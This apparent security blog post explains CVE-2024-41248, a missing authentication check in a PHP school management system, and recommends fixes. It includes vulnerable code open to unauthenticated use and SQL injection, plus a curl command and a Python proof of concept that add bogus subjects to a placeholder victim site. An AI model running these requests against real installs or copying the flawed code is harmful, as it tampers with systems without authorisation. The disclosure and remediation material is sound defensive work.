In June 2024, a new vulnerability was found in a popular open-source web application called Kashipara Responsive School Management System (SMSA) version 3.2. This vulnerability, tracked as CVE-2024-41248, allows anyone on the internet to add new subjects to the system — even if they’re not logged in! In this post, we’ll break down why this happens, show you the affected code, demonstrate a simple exploit, and offer some advice for staying safe.
What Is the Kashipara Responsive School Management System?
This software is a free PHP-based school management tool shared widely by students and small organizations on Kashipara.com. It promises features like adding students, staff management, subject management, etc.
The Vulnerability: Broken Access Control
In secure PHP projects, the rule of thumb is always to check that the user is authenticated and authorized before letting them do something important, like adding or deleting content. In SMSA v3.2., the key PHP files add_subject.php (the add form) and add_subject_submit.php (the backend that actually saves new subjects) have no access control at all.
That means anyone, anywhere, can send data to these scripts — and the server will happily add new subjects for them.
Vulnerable Code Review
Let’s look at a simplified version of the code in add_subject_submit.php (based on the open-source release):
```php
<?php
include('conn.php');
// No session_start() and no authentication check: every request reaches the insert.
$subject_name = $_POST['subject_name'];
$subject_code = $_POST['subject_code'];
// User input is concatenated straight into the query string.
$sql = "INSERT INTO subjects (subject_name, subject_code) VALUES ('$subject_name', '$subject_code')";
if(mysqli_query($conn, $sql)){
    echo "Subject added successfully!";
} else {
    echo "Error: " . mysqli_error($conn);
}
?>
```
Notice:
- No session check: There’s no session_start() and no if(!isset($_SESSION['user'])){} to verify that the request is coming from a logged-in admin or teacher.
How To Exploit (Proof of Concept)
If you know the URL of a school's SMSA install, you can add a subject with a simple POST request.
Open your terminal and run:
```shell
curl -X POST \
  -d "subject_name=HackedSubject&subject_code=HCK101" \
  http://victim-school.com/smsa/add_subject_submit.php
```
Result: The server responds "Subject added successfully!" and your entry appears in the subjects table, visible to everyone.
Proof Of Concept (Python)
```python
import requests
url = 'http://victim-school.com/smsa/add_subject_submit.php'
data = {
    'subject_name': 'Hacked by CVE-2024-41248',
    'subject_code': 'CVE202441248'
}
r = requests.post(url, data=data)
print(r.text)
```
- Disrupt learning: Teachers and staff might get confused by bogus subjects.
- Possibly escalate attacks: If they're able to trigger SQL injection or other vulnerabilities, they could go even further.
References
- Original Project on Kashipara
- CVE Record for CVE-2024-41248 (If not live, check NVD or Vuln aggregators soon)
- OWASP Broken Access Control
How To Fix
1. Require authentication before modification: At the top of both add_subject.php and add_subject_submit.php, add checks like:
```php
<?php
session_start();
if(!isset($_SESSION['user'])){
    die("Unauthorized access.");
}
```
2. Use CSRF tokens: To prevent automated attacks from other sites/scripts.
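Putting both fixes together, here is an added example of what a hardened add_subject_submit.php could look like. This is illustrative code written for this post, not code from the Kashipara project. It assumes conn.php defines a mysqli handle in $conn, that the login script stores the logged-in user in $_SESSION['user'] (the check named above), and that add_subject.php renders the token from a csrf_token() helper in a hidden field named csrf_token. It also goes one step beyond the two fixes and replaces the string-built INSERT with a prepared statement, since the original query concatenated user input directly into SQL.

```php
<?php
// Added example (not the project's code): a hardened add_subject_submit.php.
// Assumptions: conn.php provides $conn (mysqli); login stores the user in
// $_SESSION['user']; add_subject.php embeds csrf_token() in a hidden field
// named "csrf_token" (both scripts would share this helper via an include).
session_start();
include('conn.php');

// 1. Authentication: refuse any request that is not from a logged-in user.
if (!isset($_SESSION['user'])) {
    http_response_code(403);
    die("Unauthorized access.");
}

// 2. CSRF: one random token per session; the form must echo it back.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Only POST, only with a token that matches in constant time.
if ($_SERVER['REQUEST_METHOD'] !== 'POST'
    || !isset($_POST['csrf_token'])
    || !hash_equals(csrf_token(), (string) $_POST['csrf_token'])) {
    http_response_code(403);
    die("Invalid request.");
}

// 3. Input validation: bounded name, restricted code format.
$subject_name = trim((string) ($_POST['subject_name'] ?? ''));
$subject_code = trim((string) ($_POST['subject_code'] ?? ''));
if ($subject_name === '' || strlen($subject_name) > 100
    || !preg_match('/^[A-Za-z0-9_-]{1,20}$/', $subject_code)) {
    http_response_code(400);
    die("Invalid subject data.");
}

// 4. Prepared statement: bound values are never parsed as SQL.
$stmt = mysqli_prepare(
    $conn,
    "INSERT INTO subjects (subject_name, subject_code) VALUES (?, ?)"
);
mysqli_stmt_bind_param($stmt, "ss", $subject_name, $subject_code);
if (mysqli_stmt_execute($stmt)) {
    echo "Subject added successfully!";
} else {
    // Keep driver details in the server log, not in the HTTP response.
    error_log("add_subject failed: " . mysqli_stmt_error($stmt));
    echo "Error: could not add subject.";
}
mysqli_stmt_close($stmt);
?>
```

For the token to round-trip, add_subject.php needs to call session_start(), include the same csrf_token() helper, and emit `<input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>">` inside the form. With these checks in place, the unauthenticated curl and Python requests shown above receive a 403 instead of "Subject added successfully!".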
Summary
CVE-2024-41248 makes it trivial for bad actors to abuse Kashipara SMSA v3.2. by adding fake subjects, simply by visiting a URL or writing a few lines of code. If you use this application, restrict who can access add_subject.php and add_subject_submit.php, and update or patch your code as soon as possible.
Always remember: Just because a page isn’t “linked to” doesn’t mean it’s safe. If it accepts data or performs changes, guard it with authentication!
Timeline
Published on: 08/07/2024 16:15:45 UTC
Last modified on: 08/08/2024 15:07:27 UTC